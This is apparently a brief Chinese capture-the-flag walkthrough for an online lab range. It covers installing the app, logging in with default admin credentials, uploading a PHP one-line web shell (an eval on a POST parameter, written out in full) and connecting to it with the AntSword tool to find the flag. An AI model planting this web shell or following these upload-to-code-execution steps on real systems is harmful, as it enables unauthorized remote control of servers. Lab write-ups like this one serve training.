开启靶场
url访问/install来运行安装
http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/install/得知其用户和密码为admin
登录
查找文件上传位置
上传一句话木马文件
<?php echo phpinfo();@eval($_POST['flw']);?>
下载查看上传木马路径
复制路径
/storage/uploads/2024/07/31/3_uid_66aa253f9a377.php
使用蚁剑连接
连接的就是上面这个url
http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/storage/uploads/2024/07/31/1_uid_66aa34754ca41.php查找flag
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提升](https://img-blog.csdnimg.cn/img_convert/3a39ba5c5d6bcb2654d26eeb50e586f8.jpeg)
